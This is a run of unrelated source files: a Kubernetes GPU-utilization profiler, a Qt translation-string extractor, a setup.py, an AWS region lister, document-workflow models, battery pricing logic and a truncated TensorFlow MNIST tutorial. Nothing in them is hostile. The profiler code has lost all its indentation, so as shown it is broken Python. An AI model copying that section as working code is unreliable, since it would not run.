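# A rough illustration of the detection above (kept as comments so nothing
# runs at import time; values are hypothetical): a utilization trace with a
# sharp burst every 30 samples yields several significant autocorrelation
# peaks (lags 0, 30, 60, ...), so the function is expected to return
# (True, 30.0), while a flat trace has no significant peaks and falls
# through to (False, -1).
#
#   spikes = pd.Series([1.0 if i % 30 == 0 else 0.0 for i in range(300)])
#   cyclic_pattern_detection(spikes)   # expected: (True, 30.0)
#   flat = pd.Series([0.5] * 300)
#   cyclic_pattern_detection(flat)     # expected: (False, -1)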
def add_pod_info_to_crd(api, crd_api, pod_name, namespace, ann, node_name):
"""1)get pod's owner by ownereference, 2)patch pod info to owner's annotation for persistent record,
sinces pods often got deleted after *job is done
assume owner is crd, not native k8s object for now, since different api group will be used
save the max utilization only for now, only patch if current util is greater than the existing annotations
"""
# 1) get owner reference
owner_kind, owner_name, owner_group, owner_version = "","","",""
try:
ret = api.list_namespaced_pod(namespace)
for i in ret.items:
if i.metadata.name == pod_name:
ref = i.metadata.owner_references
# get the first owner and print kind and name
if ref is not None and len(ref) > 0:
owner_kind = ref[0].kind.lower()
owner_name = ref[0].name.lower()
owner_group, owner_version = ref[0].api_version.lower().split("/")
break
except Exception as e:
logging.error(e)
return False
if owner_name=="" or owner_kind=="" or owner_group=="" or owner_version=="":
logging.warning("In {} namespace pod {}'s owner reference is not set, add no annotations to owner".format(namespace, pod_name))
return False
# 2) get owner's current annonation, update if greater utilization is found
try:
res = crd_api.get_namespaced_custom_object(owner_group,owner_version,namespace,
plural=owner_kind+'s',name=owner_name)
except Exception as e:
logging.error("Error: no kind: {} named {}".format(owner_kind, owner_name))
return False
# ann example ai.centaurus.io/pod_name:{mem_max:XXX,cpu_max:XXX}
key = DOMAIN + "/" + pod_name
need_patch = True
pod_ann = dict()
if key in res['metadata']['annotations']: # iteration and compare,
need_patch = False
pod_ann = ast.literal_eval(res['metadata']['annotations'][key]) # convert string to dictionary
for k, v in pod_ann.items():
domain_k = DOMAIN + "/" + k # the key in owner's annotation has no domain name
if k == "node": # skip the node comparison
continue
if float(v) < ann[domain_k]: # detect greater utilization, update
pod_ann[k] = ann[domain_k]
need_patch = True
else: # simply remove the domain name from new ann
pod_ann = ann
ann['node'] = node_name
# patch the info
if need_patch:
crd_ann = dict()
crd_ann[key] = str(pod_ann).replace(DOMAIN+"/","")
body = {'metadata':{'annotations':crd_ann}}
res = crd_api.patch_namespaced_custom_object(owner_group,owner_version,namespace,
plural=owner_kind+'s',name=owner_name,body=body)
logging.info("patch crd utilization done {}: {}".format(owner_name,res['metadata']['annotations'][key]))
return True
def patch_annotation(api, name, ann, namespace="", node_name="", crd_api=None):
"""check if object exists first"""
ann2 = copy.deepcopy(ann) # copy and then make changes
# reformat dictionary, in case it is nested, flatten to one level by cast nested dict to string
for k, v in ann2.items():
if v is not None: # if v is None, it means delete the existing annotaion
ann2[k]=str(v)
body = {'metadata': {'annotations':ann2}}
if namespace == "": # patch node
api.patch_node(name, body)
else: # patch pod, verify pod existence first
pod_exist = False
pods = api.list_namespaced_pod(namespace)
for i in pods.items:
if i.metadata.name == name:
pod_exist = True
break
if pod_exist:
api.patch_namespaced_pod(name, namespace, body)
# patch pod info to owner custom resources, assume owner is CRD for now, dont handle native object like, job, statefulSet ...
if crd_api is not None:
add_pod_info_to_crd(api, crd_api, name, namespace, ann, node_name)
return True
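# A sketch of the flattening patch_annotation performs (hypothetical values):
# a nested annotation such as
#   {'ai.centaurus.io/gpu-0': {'max_gpu_util': 97, 'mem_used': '4GB'}}
# is sent to the API server as
#   {'metadata': {'annotations':
#       {'ai.centaurus.io/gpu-0': "{'max_gpu_util': 97, 'mem_used': '4GB'}"}}}
# because Kubernetes annotation values must be strings; a value of None is
# left as-is, which makes the patch delete that annotation key.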
def collect_gpu_usage_nvml(gpu_idx):
cur_usage = dict()
try:
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(gpu_idx)
except Exception as e:
logging.error(e)
return cur_usage
cur_usage['mem_used'] =str(math.ceil(nvmlDeviceGetMemoryInfo(handle).used/pow(1024,3))) + 'GB'
cur_usage['mem_free'] =str(math.ceil(nvmlDeviceGetMemoryInfo(handle).total/pow(1024,3)) - math.ceil(nvmlDeviceGetMemoryInfo(handle).used/pow(1024,3))) + 'GB'
processes = nvmlDeviceGetComputeRunningProcesses(handle)
cur_usage['process_cnt'] = len(processes)
if len(processes) > 0:
cur_usage['pid-mem'] = [(i.pid, str(math.ceil(i.usedGpuMemory/pow(1024,2)))+'MB') for i in processes]
#cur_usage['pid-mem-gutil'] =[(i.pid, i.usedGpuMemory) for i in processes]
return cur_usage
def remove_annotation(api, node_name, pod_name="", ns=""):
# 1) get pod name and namespace on the node, scan all the keys in annoations, if start with ai.centaurus.io, set to none
field_selector = 'spec.nodeName='+node_name
ret = api.list_pod_for_all_namespaces(watch=False, field_selector=field_selector)
for i in ret.items:
if pod_name != "" and (i.metadata.name != pod_name or i.metadata.namespace != ns):
continue
if i.metadata.annotations is not None:
ann_rm = dict()
for key in i.metadata.annotations:
if key.startswith("ai.centaurus.io"): # add the removal dict
ann_rm[key] = None
if len(ann_rm) > 0:
patch_annotation(api, i.metadata.name, ann_rm, i.metadata.namespace)
logging.info("Init reset pod {}'s annotation, remove {}".format(i.metadata.name,ann_rm.keys()))
def collect_pod_metrics(api, cur_usage, node_name, gpu_id, pods_ann):
"""
pods_ann: dict()
key: dlt-job:default #podname:namespace
value (annotations): {"ai.centaurusinfra.io/gpu-memused":[(0,137MB),(1,1125MB)]}, #tuple (gpu_id, memused)
"""
# 1) get pod name and namespace on the node
field_selector = 'spec.nodeName='+node_name
ret = api.list_pod_for_all_namespaces(watch=False, field_selector=field_selector)
pod_ns = dict()
for i in ret.items:
pod_ns[i.metadata.name] = i.metadata.namespace
# 2) get pod name by pid
bashCmd = ["nsenter", "--target", "XXX", "--uts", "hostname"]
for pid, mem_used in cur_usage['pid-mem']:
mem_used_float = float(mem_used[:-2])
bashCmd[2]=str(pid)
subp = subprocess.Popen(bashCmd, stdout=subprocess.PIPE)
output, error = subp.communicate()
if error is None:
pod_name = output.decode("utf-8").rstrip()
if pod_name in pod_ns:
# 3) format results to dict, key: "podname:namespace:gpu_id", value:"{DOMAIN + "/gpu-memused":memused}"
key = pod_name + ":" + pod_ns[pod_name]
# list format for gpu mem usage
#e.g. ai.centaurus.io/gpu-memused:[('0','12000MB'),('1','159MB')]
if key in pods_ann:
pods_ann[key][DOMAIN + "/" +node_name + "-gpu-" +str(gpu_id)+"_mem_mb"] = mem_used_float
pods_ann[key][DOMAIN + "/" +node_name + "-gpu-" +str(gpu_id)+"_util"] = cur_usage['max_gpu_util']
else:
value = {DOMAIN + "/" +node_name +"-gpu-" +str(gpu_id)+"_util":cur_usage['max_gpu_util'],
DOMAIN + "/" +node_name +"-gpu-" +str(gpu_id)+"_mem_mb":mem_used_float
}
pods_ann[key] = value
else:
logging.error("pod name {} is not in listed all pods,{}".format(pod_name, pod_ns.keys)) # there was a podname key="" incident, not reproduced
else:
logging.error("nsenter failed to acquire pod name,{}".format(error))
return pods_ann
def get_pod_resource_util(pod_name, ns, promi_connector, duration="30s"):
"""use query to get resource utilization"""
cpu_usage_value, memory_usage_value, network_usage_value, io_usage_value = 0,0,0,0
cpu_usage = promi_connector.custom_query(query="sum(rate(container_cpu_usage_seconds_total{container_label_io_kubernetes_pod_name=\"" + pod_name + "\", container_label_io_kubernetes_pod_namespace=\"" + ns + "\"}[" + duration + "]))by(container_label_io_kubernetes_pod_name)")
if len(cpu_usage) > 0:
cpu_usage_value = cpu_usage[0]["value"][1]
memory_usage = promi_connector.custom_query(query="sum(rate(container_memory_usage_bytes{container_label_io_kubernetes_pod_name=\"" + pod_name + "\", container_label_io_kubernetes_pod_namespace=\"" + ns + "\"}[" + duration + "]))by(container_label_io_kubernetes_pod_name)")
if len(memory_usage) > 0:
memory_usage_value = memory_usage[0]["value"][1]
network_usage = promi_connector.custom_query(query="sum(rate(container_network_transmit_bytes_total{container_label_io_kubernetes_pod_name=\"" + pod_name + "\", container_label_io_kubernetes_pod_namespace=\"" + ns + "\"}[" + duration + "]))by(container_label_io_kubernetes_pod_name)")
if len(network_usage) > 0:
network_usage_value = network_usage[0]["value"][1]
io_usage = promi_connector.custom_query(query="sum(rate(container_fs_write_seconds_total{container_label_io_kubernetes_pod_name=\"" + pod_name + "\", container_label_io_kubernetes_pod_namespace=\"" + ns + "\"}[" + duration + "]))by(container_label_io_kubernetes_pod_name)")
if len(io_usage) > 0:
io_usage_value = io_usage[0]["value"][1]
return cpu_usage_value, memory_usage_value, network_usage_value, io_usage_value
def profiling(api, url, pod_ip, node_name, ana_window='2m', metrics=MEM_UTIL):
"""if key exists, the value will be replaced,
add dynamic status
{ai.centaurus.io/gpu0:{cur_mem_used:4GB, max_gpu_util:60, max_mem_cpy_util:34, cyclic:True, process_cnt:1},
ai.centaurus.io/gpu1:{cur_mem_used:4GB, max_gpu_util:60, max_mem_cpy_util:34, cyclic:True, process_cnt:2, processes:[{pid:25678, cur_mem_used:3GB},{pid:67234, cur_mem_used:1GB}]}
}
"""
node_dict = dict()
pod_dict = dict()
promi = PrometheusConnect(url=url, disable_ssl=True)
# except connection error
try:
promi.check_prometheus_connection()
except Exception as e:
logging.error(e)
return node_dict, pod_dict # if connectioin fails, return empty dict
instance = pod_ip + ":9400" # tmp fixed
start_time = parse_datetime(ana_window)
end_time = parse_datetime("now")
my_label_config = {"instance": instance} # select current host metrics
metric_data = promi.get_metric_range_data(metric_name=metrics,
label_config=my_label_config,
start_time=start_time,
end_time=end_time)
# reorganize data to label_config and metric_values
metric_object_list = MetricsList(metric_data)
for item in metric_object_list: # iterate through all the gpus on the node
if 'gpu' not in item.label_config: # handle metric config info exception
continue
id = item.label_config['gpu'] # predefined key from dcgm (gpu index)
cur_usage = collect_gpu_usage_nvml(int(id)) # nvml access GPU usage
# ip = item.label_config['instance']
key = DOMAIN + "/gpu-" + id
# analyze mem util curve
ts = item.metric_values.iloc[:, 1] # metrics_values are two row df, 1st is timestamp, 2nd is value
cur_usage['cyclic_pattern'] = False
if ts.max() > 0:
cyclic, period = cyclic_pattern_detection(ts)
if cyclic:
cur_usage['cyclic_pattern'] = True
cur_usage['period'] = str(period)
cur_usage['max_mem_util'] = ts.max()
# add gpu id to query condition, query again get the max_gpu_util
my_label_config['gpu'] = id
gpu_util_data = promi.get_metric_range_data(metric_name=GPU_UTIL,
label_config=my_label_config,
start_time=start_time,
end_time=end_time)
gpu_util_list = MetricsList(gpu_util_data)
if len(gpu_util_list) != 1:
logging.error("gpu util data read error, expect len {}, not equal to 1".format(len(gpu_util_list)))
else:
gpu_util_ts = gpu_util_list[0].metric_values.iloc[:, 1]
cur_usage['max_gpu_util'] = gpu_util_ts.max()
# Important: flatten nested dictionary to string, otherwise error "cannot unmarshal string into Go value of type map[string]interface {}""
#node_dict[key] = str(cur_usage)
# move the string cast to patch_annotation function
node_dict[key] = cur_usage
if "process_cnt" in cur_usage and cur_usage['process_cnt'] > 0:
collect_pod_metrics(api, cur_usage, node_name, id, pod_dict) # a pod may use multiple GPUs, so the dictionary value is appended
# add cadvisor metrics to pod
for k, v in pod_dict.items():
pod_name, ns = k.split(":")
cpu, memory, network, io = get_pod_resource_util(pod_name,ns, promi) # the values are str type
# v[DOMAIN + '/cpu_util'] = str(round(float(cpu)*100,2)) + '%'
# v[DOMAIN + '/cpu_mem'] = str(round(float(memory)/1e6,2)) + 'MB'
# v[DOMAIN + '/network'] = str(round(float(network)/1e3,2)) + 'KBps'
# v[DOMAIN + '/disk_io'] = io
v[DOMAIN + '/cpu_util'] = round(float(cpu)*100,2) # unit percentage
v[DOMAIN + '/cpu_mem_mb'] = round(float(memory)/1e6,2) # unit MB
v[DOMAIN + '/network_mbps'] = round(float(network)/1e6,2) # unit MBps
v[DOMAIN + '/disk_io'] = round(float(io),2)
return node_dict, pod_dict
def load_env_var():
env_var = dict()
if 'KUBERNETES_PORT' not in os.environ:
logging.error("RUNNING cluster is not avaliable")
return env_var, True
if "PROMETHEUS_SERVICE_HOST" in os.environ and "PROMETHEUS_SERVICE_PORT" in os.environ:
# use service name instead of IP, to avoid IP changes during service restart
url = "http://prometheus:" + os.environ['PROMETHEUS_SERVICE_PORT']
env_var['url'] = url
else:
logging.error("PROMETHEUS_SERVICE_HOST cannot be found in environment variable, "
"Please make sure service is launched before profiler deployment")
return env_var, True
if "MY_POD_IP" in os.environ:
env_var['pod_ip'] = os.environ['MY_POD_IP']
else:
logging.error("MY_POD_IP cannot be found in environment variables, "
"Please check profiler deployment file to include it as env.")
return env_var, True
if "MY_HOST_IP" in os.environ:
env_var['host_ip'] = os.environ['MY_HOST_IP']
else:
logging.error("MY_HOST_IP cannot be found in environment variables, "
"Please check profiler deployment file to include it as env.")
return env_var, True
if "MY_NODE_NAME" in os.environ:
env_var['node_name'] = os.environ['MY_NODE_NAME']
else:
logging.error("MY_HOST_NAME cannot be found in environment variables, "
"Please check profiler deployment file to include it as env.")
return env_var, True
return env_var, False
def collect_gpu_attributes():
"""if key exists, the value will be replaced
{ai.centaurus.io/gpu-static:{count:2,
gpus:[{index:0, pcie_bus_id:0000:84:00.0, model:TITANX, mem_size: 12GB, pcie_gen_width:1X16},
{index:1, pcie_bus_id:0000:88:00.0, model:TITANX, mem_size: 12GB, pcie_gen_width:1X16}
]
}
}
"""
attributes = dict()
try:
nvmlInit()
except Exception as e:
logging.error(e)
return attributes, True
deviceCount = nvmlDeviceGetCount()
attributes['count']=str(deviceCount)
# only get gpu0's attributes, assume same GPU card on one server
try:
handle = nvmlDeviceGetHandleByIndex(0)
except Exception as e:
logging.error(e)
return attributes, True
attributes['model'] = nvmlDeviceGetName(handle).decode("utf-8")
attributes['mem_size'] = str(math.ceil(nvmlDeviceGetMemoryInfo(handle).total/pow(1024,3))) + 'GB'
attributes['pcie_gen_width'] = str(nvmlDeviceGetCurrPcieLinkGeneration(handle)) + 'x' + str(nvmlDeviceGetCurrPcieLinkWidth(handle))
key = DOMAIN + "/gpu-static"
annotation = {key:attributes}
return annotation, False
def app_top():
env_var, err = load_env_var()
if err:
logging.error("Not all environment variables are avaliable in the profiler pod")
exit(1)
    # 0) load kubernetes config
config.load_incluster_config()
core_api = client.CoreV1Api()
crd_api = client.CustomObjectsApi()
# 1) init stage, get gpu static attribute, remove pod annotation from previous run
gpu_attributes, err = collect_gpu_attributes()
while err:
logging.warning("NVML lib is not installed or No GPUs avaliable, or GPU lost, check back after 30 sec")
time.sleep(30)
gpu_attributes, err = collect_gpu_attributes()
patch_annotation(core_api, env_var['node_name'], gpu_attributes)
logging.info("Init add gpu static attributes \n{}".format(gpu_attributes))
# remove pod annotations from ai.centaurus.io,
remove_annotation(core_api, env_var['node_name'])
    # 3) infinite loop to monitor resource utilization and annotate nodes, pods, and CRDs
# keep current annotatations, if no changes, no patch sent
node_ann_cur = dict()
pods_ann_cur = dict()
while True:
# profiling, add gpu dynamic status
node_ann_new, pods_ann_new = profiling(core_api, env_var['url'], env_var['pod_ip'],env_var['node_name'])
# update node annotation if changes detected
if node_ann_new != node_ann_cur:
patch_annotation(core_api, env_var['node_name'], node_ann_new)
logging.info("Node change detected, update node's GPU utilization")
node_ann_cur = node_ann_new
# update pod annotation
if pods_ann_new != pods_ann_cur:
logging.info("Pod change deteacted, update pods GPU utilization")
for name_ns, values in pods_ann_new.items(): # iterate all the pods needs to be annotated
pod_name, namespace = name_ns.split(":")
patch_annotation(core_api, pod_name, values, namespace, env_var['node_name'], crd_api) # patch pod and patch owner crd
for name_ns, values in pods_ann_cur.items():
if name_ns not in pods_ann_new: # ended pods or processes
pod_name, namespace = name_ns.split(":")
logging.info("Remove pod {} annotation for finished process \n".format(pod_name))
remove_annotation(core_api,env_var['node_name'],pod_name, namespace)
pods_ann_cur = pods_ann_new
time.sleep(30)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s',level=logging.INFO)
app_top()
|
the-stack_106_23369 | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
import os
import sys
OUT_CPP="qt/moselbitstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
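# A sketch of the 'po' text handled above; xgettext emits entries such as
#
#   msgid "Hello"
#   msgstr ""
#
#   msgid ""
#   "multi-line "
#   "entry"
#   msgstr ""
#
# which parse_po() returns as
#   [(['"Hello"'], ['""']), (['""', '"multi-line "', '"entry"'], ['""'])]
# i.e. each msgid/msgstr is kept as the list of its quoted source lines,
# and single-line empty msgids compare equal to EMPTY below.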
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *moselbit_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("moselbit-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
|
the-stack_106_23371 | """
Datadog exporter
"""
from setuptools import find_packages, setup
dependencies = ['boto3', 'click', 'pytz', 'durations', 'tzlocal', 'datadog', 'requests', 'python-dateutil']
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='datadog-exporter',
version="0.6.5",
url='https://github.com/binxio/datadog-exporter',
license='Apache2',
author='Mark van Holsteijn',
author_email='[email protected]',
description='CLI for exporting datadog metrics',
long_description=long_description,
long_description_content_type='text/markdown',
package_dir={'': 'src'},
packages=find_packages(where='src'),
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=dependencies,
setup_requires=[],
tests_require=dependencies + ['pytest', 'botostubs', 'pytest-runner', 'mypy', 'yapf', 'twine', 'pycodestyle' ],
test_suite='tests',
entry_points={
'console_scripts': [
'datadog-exporter = datadog_export.__main__:main'
],
},
classifiers=[
# As from http://pypi.python.org/pypi?%3Aaction=list_classifiers
# 'Development Status :: 1 - Planning',
# 'Development Status :: 2 - Pre-Alpha',
'Development Status :: 3 - Alpha',
# 'Development Status :: 4 - Beta',
#'Development Status :: 5 - Production/Stable',
# 'Development Status :: 6 - Mature',
# 'Development Status :: 7 - Inactive',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX',
'Operating System :: MacOS',
'Operating System :: Unix',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
|
the-stack_106_23372 | #!/bin/env python
import sys
import boto3
from botocore.exceptions import ClientError
# To get a list of the AWS regions we have access to:
ec2 = boto3.client('ec2')
aws_regions = ec2.describe_regions()
print ('\nRegions we have access to:\n')
for region in aws_regions['Regions']:
region_name = region['RegionName']
print (' ', region_name)
print ('')
|
the-stack_106_23373 | import json
import logging
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from mayan.apps.acls.models import AccessControlList
from mayan.apps.documents.models import Document
from ..managers import ValidWorkflowInstanceManager
from ..permissions import permission_workflow_instance_transition
from .workflow_models import Workflow
from .workflow_transition_models import (
WorkflowTransition, WorkflowTransitionField
)
__all__ = ('WorkflowInstance', 'WorkflowInstanceLogEntry')
logger = logging.getLogger(name=__name__)
class WorkflowInstance(models.Model):
workflow = models.ForeignKey(
on_delete=models.CASCADE, related_name='instances', to=Workflow,
verbose_name=_('Workflow')
)
document = models.ForeignKey(
on_delete=models.CASCADE, related_name='workflows', to=Document,
verbose_name=_('Document')
)
context = models.TextField(
blank=True, verbose_name=_('Context')
)
objects = models.Manager()
valid = ValidWorkflowInstanceManager()
class Meta:
ordering = ('workflow',)
unique_together = ('document', 'workflow')
verbose_name = _('Workflow instance')
verbose_name_plural = _('Workflow instances')
def __str__(self):
return force_text(s=getattr(self, 'workflow', 'WI'))
def do_transition(
self, transition, comment=None, extra_data=None, user=None
):
try:
if transition in self.get_transition_choices(_user=user).all():
if extra_data:
context = self.loads()
context.update(extra_data)
self.dumps(context=context)
return self.log_entries.create(
comment=comment or '',
extra_data=json.dumps(obj=extra_data or {}),
transition=transition, user=user
)
except AttributeError:
# No initial state has been set for this workflow.
if settings.DEBUG:
raise
def dumps(self, context):
"""
Serialize the context data.
"""
self.context = json.dumps(obj=context)
self.save()
def get_absolute_url(self):
return reverse(
viewname='document_states:workflow_instance_detail', kwargs={
'workflow_instance_id': self.pk
}
)
def get_context(self):
# Keep the document instance in the workflow instance fresh when
# there are cascade state actions, where a second state action is
# triggered by the events generated by a first state action.
self.document.refresh_from_db()
context = {
'document': self.document, 'workflow': self.workflow,
'workflow_instance': self
}
context['workflow_instance_context'] = self.loads()
return context
def get_current_state(self):
"""
Actual State - The current state of the workflow. If there are
multiple states available, for example: registered, approved,
archived; this field will tell at the current state where the
document is right now.
"""
try:
return self.get_last_transition().destination_state
except AttributeError:
return self.workflow.get_initial_state()
def get_last_log_entry(self):
try:
return self.log_entries.order_by('datetime').last()
except AttributeError:
return None
def get_last_transition(self):
"""
Last Transition - The last transition used by the last user to put
the document in the actual state.
"""
try:
return self.get_last_log_entry().transition
except AttributeError:
return None
def get_runtime_context(self):
"""
Alias of self.load() to get just the runtime context of the instance
for ease of use in the condition template.
"""
return self.loads()
def get_transition_choices(self, _user=None):
current_state = self.get_current_state()
if current_state:
queryset = current_state.origin_transitions.all()
if _user:
queryset = AccessControlList.objects.restrict_queryset(
permission=permission_workflow_instance_transition,
queryset=queryset, user=_user
)
# Remove the transitions with a false return value.
for entry in queryset:
if not entry.evaluate_condition(workflow_instance=self):
queryset = queryset.exclude(id=entry.pk)
return queryset
else:
"""
This happens when a workflow has no initial state and a document
whose document type has this workflow is created. We return an
empty transition queryset.
"""
return WorkflowTransition.objects.none()
def loads(self):
"""
Deserialize the context data.
"""
return json.loads(s=self.context or '{}')
class WorkflowInstanceLogEntry(models.Model):
"""
Fields:
* user - The user who last transitioned the document from a state to the
Actual State.
* datetime - Date Time - The date and time when the last user transitioned
the document state to the Actual state.
"""
workflow_instance = models.ForeignKey(
on_delete=models.CASCADE, related_name='log_entries',
to=WorkflowInstance, verbose_name=_('Workflow instance')
)
datetime = models.DateTimeField(
auto_now_add=True, db_index=True, verbose_name=_('Datetime')
)
transition = models.ForeignKey(
on_delete=models.CASCADE, to='WorkflowTransition',
verbose_name=_('Transition')
)
user = models.ForeignKey(
blank=True, null=True, on_delete=models.CASCADE,
to=settings.AUTH_USER_MODEL, verbose_name=_('User')
)
comment = models.TextField(blank=True, verbose_name=_('Comment'))
extra_data = models.TextField(blank=True, verbose_name=_('Extra data'))
class Meta:
ordering = ('datetime',)
verbose_name = _('Workflow instance log entry')
verbose_name_plural = _('Workflow instance log entries')
def __str__(self):
return force_text(s=self.transition)
def clean(self):
        if self.transition not in self.workflow_instance.get_transition_choices(
            _user=self.user
        ):
raise ValidationError(_('Not a valid transition choice.'))
def get_extra_data(self):
result = {}
for key, value in self.loads().items():
try:
field = self.transition.fields.get(name=key)
except WorkflowTransitionField.DoesNotExist:
"""
                There is a reference to a field that does not exist or
has been deleted.
"""
else:
result[field.label] = value
return result
def loads(self):
"""
Deserialize the context data.
"""
return json.loads(s=self.extra_data or '{}')
def save(self, *args, **kwargs):
result = super().save(*args, **kwargs)
context = self.workflow_instance.get_context()
context.update(
{
'entry_log': self
}
)
for action in self.transition.origin_state.exit_actions.filter(enabled=True):
context.update(
{
'action': action,
}
)
action.execute(
context=context, workflow_instance=self.workflow_instance
)
for action in self.transition.destination_state.entry_actions.filter(enabled=True):
context.update(
{
'action': action,
}
)
action.execute(
context=context, workflow_instance=self.workflow_instance
)
return result
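# Illustrative usage sketch (not part of the original module): a minimal
# example of how WorkflowInstance.do_transition() is typically driven. The
# `document`, `workflow`, `transition` and `user` arguments are assumed to be
# existing model instances supplied by the caller; nothing here is called
# from within this module.
def _example_transition_document(
    document, workflow, transition, user, comment=''
):
    workflow_instance = document.workflows.get(workflow=workflow)
    # Only transitions the user has access to and whose conditions evaluate
    # truthy are returned by get_transition_choices().
    if transition in workflow_instance.get_transition_choices(_user=user):
        # Saving the resulting log entry fires the origin state's exit
        # actions and the destination state's entry actions.
        return workflow_instance.do_transition(
            comment=comment, transition=transition, user=user
        )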
|
the-stack_106_23375 | class LogicB(object):
def __init__(self, device_instance):
self.di = device_instance
def update_status(self):
"""
"""
if not len(self.di._hourly_prices):
# no hourly prices have been calculated
return
# update the charge on the device
self.di.update_state_of_charge()
# calculate the charge/discharge price thresholds
(price_threshold_discharge, price_threshold_charge) = self.calculate_price_thresholds()
# compare the current price to the calculated thresholds
if self.di.is_discharging() and self.di._price < price_threshold_discharge:
# stop discharging if price is below the threshold
self.di.stop_discharging()
        elif not self.di.is_discharging() and self.di._price > price_threshold_discharge:
            # start discharging once the price rises above the discharge threshold
            self.di.enable_discharge()
elif self.di.is_charging() and self.di._price > price_threshold_charge:
self.di.stop_charging()
def calculate_price_thresholds(self):
if not len(self.di._hourly_prices):
return
avg_24 = sum(self.di._hourly_prices) / len(self.di._hourly_prices)
min_24 = min(self.di._hourly_prices)
max_24 = max(self.di._hourly_prices)
        # set the starting discharge/charge thresholds at 10% above/below the average
price_threshold_discharge = avg_24 * 1.10
price_threshold_charge = avg_24 * 0.90
if self.di._current_soc >= 0.5:
# charge at >= 50%
if price_threshold_discharge >= self.di._discharge_price_threshold:
price_threshold_discharge = self.di._discharge_price_threshold
price_threshold_charge = self.di._charge_price_threshold
else:
soc_ratio = (self.di._current_soc - 0.5) / 0.5
price_adjustment = (max_24 - price_threshold_discharge) * soc_ratio
price_threshold_discharge += price_adjustment
price_threshold_charge += price_adjustment
else:
# charge at < 50%
if price_threshold_charge <= self.di._charge_price_threshold:
price_threshold_charge = self.di._charge_price_threshold
price_threshold_discharge = self.di._discharge_price_threshold
else:
soc_ratio = self.di._current_soc / 0.5
price_adjustment = (self.di._charge_price_threshold - min_24) * soc_ratio
price_threshold_discharge += price_adjustment
price_threshold_charge += price_adjustment
return (price_threshold_discharge, price_threshold_charge)
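# Illustrative sketch (not part of the original class): the same threshold
# arithmetic applied to plain numbers. `_StubDevice` only mimics the
# attributes that calculate_price_thresholds() reads; the price and
# state-of-charge values below are made up.
class _StubDevice(object):
    def __init__(self, hourly_prices, current_soc):
        self._hourly_prices = hourly_prices
        self._current_soc = current_soc
        self._charge_price_threshold = 0.08
        self._discharge_price_threshold = 0.12
if __name__ == '__main__':
    logic = LogicB(device_instance=_StubDevice(
        hourly_prices=[0.05, 0.10, 0.15, 0.20], current_soc=0.75
    ))
    # avg price is 0.125, so the starting thresholds are 0.1375 (discharge)
    # and 0.1125 (charge); with a 75% state of charge the starting discharge
    # value already exceeds the device cap, so both thresholds clamp to the
    # device limits and this prints (0.12, 0.08).
    print(logic.calculate_price_thresholds())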
|
the-stack_106_23376 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Trains and Evaluates the MNIST network using a feed dictionary."""
# pylint: disable=missing-docstring
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.examples.tutorials.mnist import mnist
# Basic model parameters as external flags.
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')
flags.DEFINE_integer('max_steps', 2000, 'Number of steps to run trainer.')
flags.DEFINE_integer('hidden1', 128, 'Number of units in hidden layer 1.')
flags.DEFINE_integer('hidden2', 32, 'Number of units in hidden layer 2.')
flags.DEFINE_integer('batch_size', 100, 'Batch size. '
'Must divide evenly into the dataset sizes.')
flags.DEFINE_string('train_dir', 'data', 'Directory to put the training data.')
flags.DEFINE_boolean('fake_data', False, 'If true, uses fake data '
'for unit testing.')
def placeholder_inputs(batch_size):
"""Generate placeholder variables to represent the input tensors.
These placeholders are used as inputs by the rest of the model building
code and will be fed from the downloaded data in the .run() loop, below.
Args:
batch_size: The batch size will be baked into both placeholders.
Returns:
images_placeholder: Images placeholder.
labels_placeholder: Labels placeholder.
"""
# Note that the shapes of the placeholders match the shapes of the full
# image and label tensors, except the first dimension is now batch_size
# rather than the full size of the train or test data sets.
